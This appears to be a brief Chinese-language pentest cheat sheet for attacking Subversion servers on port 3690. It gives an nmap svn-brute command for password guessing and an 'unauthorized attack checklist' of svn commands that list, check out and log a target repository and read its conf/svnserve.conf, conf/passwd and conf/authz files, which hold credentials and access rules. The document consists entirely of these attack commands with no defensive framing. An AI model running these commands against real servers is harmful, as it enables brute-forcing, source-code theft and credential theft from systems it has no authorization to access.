svn
目录
svn默认端口3690
探测
nmap -p 3690 --script svn-brute <target>
未授权
未授权攻击清单:
下面是常用的
元数据泄露
svn ls svn://<target>:3690
代码泄露
svn checkout svn://<target>:3690
日志泄露
svn log svn://<target>:3690
配置文件泄露
svn cat svn://<target>:3690/conf/svnserve.conf
svn cat svn://<target>:3690/conf/passwd
svn cat svn://<target>:3690/conf/authz